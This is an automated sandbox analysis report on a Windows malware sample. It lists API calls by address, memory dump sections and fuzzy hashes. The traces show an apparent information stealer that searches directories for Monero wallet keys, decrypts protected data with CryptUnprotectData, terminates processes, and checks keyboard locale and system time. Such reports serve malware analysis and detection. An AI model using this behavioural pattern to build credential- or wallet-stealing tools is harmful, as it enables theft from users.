                                      • FindClose.KERNEL32(000000FF), ref: 00A31E72
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 3edea43479dc0a48e3ab2d88da75abc5d7d2d19abc337e91e0792733a2c3fff5
                                      • Instruction ID: ea07831e8e1a328fb485f26c4fe0be1c61a9ea3abd40340b60e4da5d7b17d40e
                                      • Opcode Fuzzy Hash: 3edea43479dc0a48e3ab2d88da75abc5d7d2d19abc337e91e0792733a2c3fff5
                                      • Instruction Fuzzy Hash: 44125575950518ABDB15FBA0CEA6EEE7339BFA4300F4045D9B50A62091EF306F89CF61
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A50C32), ref: 00A3DF5E
                                      • StrCmpCA.SHLWAPI(?,00A515C0), ref: 00A3DFAE
                                      • StrCmpCA.SHLWAPI(?,00A515C4), ref: 00A3DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00A3E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: bfa19b370d0b70b41bc2e535e78d96c779bba11f1224bab5a08c209881bddb87
                                      • Instruction ID: 350fbbba489c6ac1f7e839ba04663d7c60613e1d794248325ac3c6721220ffc3
                                      • Opcode Fuzzy Hash: bfa19b370d0b70b41bc2e535e78d96c779bba11f1224bab5a08c209881bddb87
                                      • Instruction Fuzzy Hash: 3FF1EE769505289BDB15FB60CEA6EEE7339BFA4340F4045D9B40A62091EF306F89CF61
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A515A8,00A50BAF), ref: 00A3DBEB
                                      • StrCmpCA.SHLWAPI(?,00A515AC), ref: 00A3DC33
                                      • StrCmpCA.SHLWAPI(?,00A515B0), ref: 00A3DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00A3DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 57d6cf2e8a71373ddb6534655302bbdef2824c1452b0742f17b0463bacb1678b
                                      • Instruction ID: 711b35a4e9043fcb8f5475b9d9ecab5aea8a3fb032e4913e276abbc22c3e6ae0
                                      • Opcode Fuzzy Hash: 57d6cf2e8a71373ddb6534655302bbdef2824c1452b0742f17b0463bacb1678b
                                      • Instruction Fuzzy Hash: 6D915577A402149BDB14FB70EE96AED737DAFD4341F404568F90B96181EE34AB08CB92
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A49905
                                      • Process32First.KERNEL32(00A39FDE,00000128), ref: 00A49919
                                      • Process32Next.KERNEL32(00A39FDE,00000128), ref: 00A4992E
                                      • StrCmpCA.SHLWAPI(?,00A39FDE), ref: 00A49943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A4997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00A49987
                                      • CloseHandle.KERNEL32(00A39FDE), ref: 00A49993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 19a37fe4e5d3159280f404af35cc09d5eef45f6c64cb85b80fecae04205a727a
                                      • Instruction ID: 5db48841dcb72bdfca84a1a9a58d2cadaa8c6b3a0b58961b6feecfadbd9a5d2d
                                      • Opcode Fuzzy Hash: 19a37fe4e5d3159280f404af35cc09d5eef45f6c64cb85b80fecae04205a727a
                                      • Instruction Fuzzy Hash: 1211EF75E14318ABDB24DFA4DC48BDEB779AB88701F00458CF509EA290D774AA84CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: )l$"h;$%Q?}$20gn$;%[~$Am~$G/M$zo;w
                                      • API String ID: 0-3527859427
                                      • Opcode ID: 6c739c941896d5509280b1467e41f86fd957a33e92bc83b0dbf2404df59e6fbd
                                      • Instruction ID: 29e8e651155a24d7ffd6e98f24f57b2a724fa38d4728fb62d12128b3c1e7e3a5
                                      • Opcode Fuzzy Hash: 6c739c941896d5509280b1467e41f86fd957a33e92bc83b0dbf2404df59e6fbd
                                      • Instruction Fuzzy Hash: 57B239F360C204AFE7046E2DEC8567AFBE5EF94320F1A463DEAC587744EA3558018697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %dS$&Vo$2y^_$6>o$CD__$J_$}z$|#
                                      • API String ID: 0-2677354581
                                      • Opcode ID: a4174f0e3d6f137587c2d4072c5bb24a6d4094d7be866ad0f312375f2278a824
                                      • Instruction ID: dccc0b5b32eba99b0f3df4fd3da58b9765d48d928ae4e8c7921b43565edc21ca
                                      • Opcode Fuzzy Hash: a4174f0e3d6f137587c2d4072c5bb24a6d4094d7be866ad0f312375f2278a824
                                      • Instruction Fuzzy Hash: BFB2D4F350C6009FE304AF29EC8567AFBE5EF94720F1A8A2DE6C4C7744E63558418697
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00A505B7), ref: 00A47D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A47D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A47D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A47DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00A47EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 336a29d1acb4be14d014293dc3dc3b1f01fca7b07d4a1a8662035d6a59d538d4
                                      • Instruction ID: 4e61e685c7e481428063ecd2eee2fcdf203bdd070ba3a0187a997bd676ecd32b
                                      • Opcode Fuzzy Hash: 336a29d1acb4be14d014293dc3dc3b1f01fca7b07d4a1a8662035d6a59d538d4
                                      • Instruction Fuzzy Hash: A0415E75940218ABDB24DBA4DD99FEEB374FF94700F2041D9E00AA6290DB742F85CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $&^Z$0{$3j$7<?$:jk$2Sv$O~
                                      • API String ID: 0-4089210368
                                      • Opcode ID: 99331545b75ca27c43bb05cc0461b9600713c739cff6a997b62169fc4ca253e5
                                      • Instruction ID: e84ff1d23e232747c7c6b683ceb741eec4ada3b093fba2c5fc43791f728c93c8
                                      • Opcode Fuzzy Hash: 99331545b75ca27c43bb05cc0461b9600713c739cff6a997b62169fc4ca253e5
                                      • Instruction Fuzzy Hash: 24B2E5F3A082049FE314AE2DEC8566AFBE9EF94720F1A493DE6C4C3744E63558058797
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A50D79), ref: 00A3E5A2
                                      • StrCmpCA.SHLWAPI(?,00A515F0), ref: 00A3E5F2
                                      • StrCmpCA.SHLWAPI(?,00A515F4), ref: 00A3E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 24b0b30485bddd1f34776cb6b37f6196dc70e9a10d73b52c93192def9c48687e
                                      • Instruction ID: 0a535b564dd45e225ad250d05631daefe4ee9ccd64b92a92ba14f84b5881386b
                                      • Opcode Fuzzy Hash: 24b0b30485bddd1f34776cb6b37f6196dc70e9a10d73b52c93192def9c48687e
                                      • Instruction Fuzzy Hash: 6E124576A501189BDB14FB60DEA6EED7339AFA4340F4045E8B50A52191EF306F49CF62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @do$DK$F{?]$rZW$w(Q$V_{
                                      • API String ID: 0-3072587368
                                      • Opcode ID: f827f7df2554d2df309c523f766cc192e33ef33fe3d6d6d55ab2221dcbd1fb87
                                      • Instruction ID: 7e1d9093f8613a4d9dcccce182600a94a3dc8cbd84241bd8a3879436d3bbafe4
                                      • Opcode Fuzzy Hash: f827f7df2554d2df309c523f766cc192e33ef33fe3d6d6d55ab2221dcbd1fb87
                                      • Instruction Fuzzy Hash: D4A2D3F3A0C6009FE304AE2DDC8567AB7E9EF94720F16493DEAC4C3744EA3558158697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: "l[$+A>$C^$fm;$5-
                                      • API String ID: 0-3770104002
                                      • Opcode ID: 8311bd265200c62ff4ea749d387122e86c6594308b34ecc5033347d5e3382a4c
                                      • Instruction ID: 210424149b1bcf3ba44d1101a1a6e382b98fbf7f83ea49e3e877f97a3a42d6ae
                                      • Opcode Fuzzy Hash: 8311bd265200c62ff4ea749d387122e86c6594308b34ecc5033347d5e3382a4c
                                      • Instruction Fuzzy Hash: FEB248F3A082049FD304AE2DEC8567AFBE9EFC4320F16463DEAC4C3744EA3558458696
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: ecadac53184a339f67e2b570eb8e36acd4bc728bc99a68cfb7534c6de069692a
                                      • Instruction ID: f6dba45e0574e7174fc64b67cc8eab1ab26a87b767a3eb099fe17ba2182bb2c8
                                      • Opcode Fuzzy Hash: ecadac53184a339f67e2b570eb8e36acd4bc728bc99a68cfb7534c6de069692a
                                      • Instruction Fuzzy Hash: FC41A022E19BD9C5CB018B7444A02AEBFB22FD6210F6D82EAC4DD5F782C774454AD3A5
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A3C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A3C97C
                                      • lstrcat.KERNEL32(?,00A50B47), ref: 00A3CA43
                                      • lstrcat.KERNEL32(?,00A50B4B), ref: 00A3CA57
                                      • lstrcat.KERNEL32(?,00A50B4E), ref: 00A3CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 48557de6ca68bac358865db4c77e0ecdaab44d87cf1faac4ace84ca4cca1ac60
                                      • Instruction ID: 104d2480446047a14b4097560befc1c15a7f7d69e3bf390077b6730a35d1aab4
                                      • Opcode Fuzzy Hash: 48557de6ca68bac358865db4c77e0ecdaab44d87cf1faac4ace84ca4cca1ac60
                                      • Instruction Fuzzy Hash: E1415F75D0431E9BDB10CFA4DD89BEEB7B9BB48344F1046A8F509A7280D7706A84CFA1
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00A46C0C
                                      • sscanf.NTDLL ref: 00A46C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A46C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A46C60
                                      • ExitProcess.KERNEL32 ref: 00A46C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 4ffc98d9d5bf141349fc6755fcd5ad7dfd9406304f93cc3b5cf64930b0d3c5ef
                                      • Instruction ID: e4c7b9e124f7d0182797a4ccf71d6a0aa1e6bda1b06645b63aaa8cc643bc24b3
                                      • Opcode Fuzzy Hash: 4ffc98d9d5bf141349fc6755fcd5ad7dfd9406304f93cc3b5cf64930b0d3c5ef
                                      • Instruction Fuzzy Hash: 6621CD75D14209ABCF44DFE4E945AEEB7B5FF48300F048529F50AE7250EB34A604CB69
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A372AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A372B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A372E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A37304
                                      • LocalFree.KERNEL32(?), ref: 00A3730E
                                      Memory Dump Source
